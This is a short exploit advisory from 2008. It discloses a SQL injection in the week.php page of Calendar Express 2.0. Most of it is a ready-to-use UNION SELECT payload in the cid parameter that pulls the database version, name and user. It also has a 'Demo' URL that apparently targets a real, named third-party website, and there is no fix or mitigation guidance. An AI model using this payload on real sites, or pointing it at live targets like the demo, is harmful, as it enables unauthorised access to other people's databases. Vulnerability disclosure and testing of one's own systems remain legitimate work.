[~]-----------------------------------------------------------------------------
[~] Calendar Express version 2.0 (week.php) - SQL Injection Vulnerability
[~]
[~] http://www.phplite.com
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 08.10.2008
[~]
[~]
[~] d3v1l@spoofer.com  http://security-sh3ll.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest Gibon Pig 
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/calendars/week.php?cid=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8--
[~]
[~] Demo :-
[~]
[~] http://www.eccome.com/calendars/week.php?cid=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8--
[~] 
[~] Powered by Calendar Express 2.0
[~]--------------------------------------------------------------------------------------------------------------------------